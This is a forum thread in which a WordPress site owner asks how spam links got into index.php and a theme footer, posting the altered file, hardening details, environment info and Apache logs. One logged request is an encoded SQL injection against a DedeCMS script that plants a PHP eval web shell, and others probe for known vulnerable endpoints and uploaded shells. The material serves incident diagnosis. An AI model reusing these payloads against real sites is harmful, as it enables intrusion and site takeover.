4

I woke up today to see the top and bottom pages of my website displaying a link with text "Cheap Jerseys Free Shipping".

I quickly went in and saw that /index.php and /wp-content/themes/Avada/footer.php were changed, I removed the links and saved back.

I want to know how the person got access to both the files so I can fix it. I have looked everywhere I can, can anyone please let me know where else to look?

This is how my index.php looked before I fixed it:

<a href="http://www.example.com">Cheap Jerseys Free Shipping</a>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

I have secured my Wordpress site following the Wordpress hardening guide. The site is hosted on Amazon Lightsail.

  1. Two users have access via SSH me with sudo and Vaultpress has limited access to the /web directory. SSH access is linked to instant email notification, as soon as anyone access via SSH an email is sent with IP, access logs show no ssh access was granted.
  2. Two FTP users that have access limited read-only access to /web/downloads/ and /web/update directories only
  3. Only 1 user on Wordpress, password now changed. /wp-admin has Order allow, deny Allow from all Satisfy any and password authentication where the password file is in a .directory; AuthType Basic AuthName "Admins Only" AuthUserFile"/var/www/.xxx/xxxx/xxxxxx-xx-xxx" require valid-user wp-config.php in / directory has order allow,deny deny from all
  4. All access via firewall locked except ssh, 22, 80 and 443 Database access is limited to local only.
  5. Google Tag manager was not changed and only includes links to Analytics, Adwords, and specific click analytics.

Access (apache web access) logs that looked suspicious are below, I do not know what they mean though. Vault press backups show that the change happened between Aug 28(2:38 AM) to Aug 29 (2:38 AM)

27.24.xx.xxx - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:23 +0000] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:31 +0000] "GET /include/dialog/select_soft_post.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:33 +0000] "GET /data/cache/asd.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:39 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
95.108.xxx.xx - - [27/Aug/2018:11:20:41 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/ HTTP/1.1" 200 103653
141.8.142.161 - - [27/Aug/2018:11:20:44 +0000] "GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 65580
95.108.xxx.xx - - [27/Aug/2018:11:20:44 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/?relatedposts=1 HTTP/1.1" 200 1426
27.24.21.214 - - [27/Aug/2018:11:20:44 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/asd.php HTTP/1.1" 404 94621
66.249.xxx.xx - - [27/Aug/2018:11:20:48 +0000] "GET /blog/xxx-xxx-xxxx-tool/ HTTP/1.1" 200 105062
27.24.xx.xxx - - [27/Aug/2018:11:20:51 +0000] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 5880
27.24.xx.xxx - - [27/Aug/2018:11:20:53 +0000] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 95434
27.24.xx.xxx - - [27/Aug/2018:11:20:57 +0000] "GET /search.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:01 +0000] "GET / HTTP/1.1" 200 103770
27.24.xx.xxx - - [27/Aug/2018:11:21:07 +0000] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 97157
27.24.xx.xxx - - [27/Aug/2018:11:21:26 +0000] "GET /install.php?finish=1 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:29 +0000] "GET /da.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:36 +0000] "GET /dayrui/libraries/Chart/ofc_upload_image.php?name=shell9257.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621

128.77.xxx.xxx - - [29/Aug/2018:10:31:25 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:27 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98345
128.77.xxx.xxx - - [29/Aug/2018:10:31:33 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:35 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98330
128.77.xxx.xxx - - [29/Aug/2018:10:31:40 +0000] "GET /wp-admin HTTP/1.1" 401 735
80.122.xx.xx - - [29/Aug/2018:10:31:42 +0000] "GET / HTTP/1.1" 200 103865
66.249.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /robots.txt HTTP/1.1" 200 6059
80.122.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
66.249.xx.xxx - - [29/Aug/2018:10:31:50 +0000] "GET /blog/author/scott-baird/ HTTP/1.1" 301 553
80.122.xx.xx - - [29/Aug/2018:10:31:51 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98482
80.122.xx.xx - - [29/Aug/2018:10:31:57 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
80.122.xx.xx - - [29/Aug/2018:10:31:59 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98478
80.122.xx.xx - - [29/Aug/2018:10:32:03 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:15 +0000] "GET / HTTP/1.1" 200 103705
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET / HTTP/1.1" 200 103701
95.105.xxx.xxx - - [29/Aug/2018:10:32:30 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98347
95.105.xxx.xxx - - [29/Aug/2018:10:32:35 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:37 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:41 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
192.0.xxx.xxx - - [29/Aug/2018:10:32:44 +0000] "HEAD / HTTP/1.1" 200 5846
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98332
95.105.xxx.xxx - - [29/Aug/2018:10:32:49 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:45 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:51 +0000] "GET /wp-admin HTTP/1.1" 401 735
77.72.xxx.xxx - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
60.191.xxx.xxx - - [29/Aug/2018:10:33:17 +0000] "GET / HTTP/1.1" 200 84011/wp-admin/tools.php?page=string-locator&edit-file=index.php&file-reference=&file-type=core&string-locator-line=1&string-locator-path=%2Fvar%2Fwww%2Fmy-site%2Findex.php HTTP/1.1" 200 19947
119.my.ip - me@my-site.com [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check,wp-jquery-ui-dialog,wp-color-picker,code-editor&ver=4.9.8 HTTP/1.1" 200 86794
119.my.ip - - [29/Aug/2018:14:38:17 +0000] "GET /wp-content/plugins/string-locator//resources/js/string-locator.js?ver=2.3.1 HTTP/1.1" 200 1119
119.my.ip - me@my-site.com [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=jquery-core,jquery-migrate,utils,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,underscore,wp-codemirror&ver=4.9.8 HTTP/1.1" 200 238028
119.my.ip - - [29/Aug/2018:14:38:20 +0000] "GET /wp-json/jetpack/v4/jitm?message_path=wp%3Atools_page_string-locator%3Aadmin_notices&query=page%253Dstring-locator%252Cedit-file%253Dindex.php%252Cfile-reference%253D%252Cfile-type%253Dcore%252Cstring-locator-line%253D1%252Cstring-locator-path%253D%25252Fvar%25252Fwww%25252Fmy-site%25252Findex.php&_wpnonce=e419c5f949 HTTP/1.1" 200 819
119.my.ip - me@my-site.com [29/Aug/2018:14:37:55 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 880
161.249.xxx.xx - - [29/Aug/2018:14:38:51 +0000] "-" 408 152
119.my.ip - me@my-site.com [29/Aug/2018:14:39:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 795
119.my.ip - me@my-site.com [29/Aug/2018:15:07:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 25953

My wordpress site info

Avada Versions: 

### Avada Versions ###

Current Version: 5.6.2
Previous Version: 5.5.2  5.6.0  5.6.1

### WordPress Environment ###

Home URL: https://www.my-site.com
Site URL: https://www.my-site.com
WP Content Path: /var/www/my-site/wp-content
WP Path: /var/www/my-site/
WP Version: 4.9.8
WP Multisite: –
PHP Memory Limit: 512 MB
WP Debug Mode: –
Language: en_US

### Server Environment ###

Server Info: Apache/2.4.18 (Ubuntu)
PHP Version: 7.0.30-0ubuntu0.16.04.1. WordPress recommendation: 7.2 or above. See WordPress Requirements for details.
PHP Post Max Size: 32 MB
PHP Time Limit: 0
PHP Max Input Vars: 3000

MySQL Version: 5.7.23
Max Upload Size: 20 MB
DOMDocument: ✔
WP Remote Get: ✔
WP Remote Post: ✔
GD Library: 2.1.1

## Active Plugins (11) ###

VaultPress: by Automattic
LayerSlider WP: by Kreatura Media
Akismet Anti-Spam: by Automattic
Contact Form 7 - ZOHO CRM: by Obtain Code
Contact Form 7: by Takayuki Miyoshi
Fusion Builder: by ThemeFusion
Fusion Core: by ThemeFusion
Jetpack by WordPress.com: by Automattic
Slider Revolution: by ThemePunch
Yoast SEO Premium: by Team Yoast
WP Mail SMTP: by WPForms
schroeder
  • 123,438
  • 55
  • 284
  • 319
Waqas Tariq
  • 141
  • 1
  • 4

1 Answers1

1

Your site was probably attacked using the last PHP vulnerability on File Operation Induced Unserialization via the phar:// Stream Wrapper. In short, it's possible to upload a valid Phar archive to the server, and trigger a file operation on that file.

If this wasn't the route used, check if any of your plugins are outdated, they are the primary suspects on every Wordpress compromise. You can install WP Scan on your computer and run it against your blog. If any plugin is not updated, WP Scan will show you.

ThoriumBR
  • 50,648
  • 13
  • 127
  • 142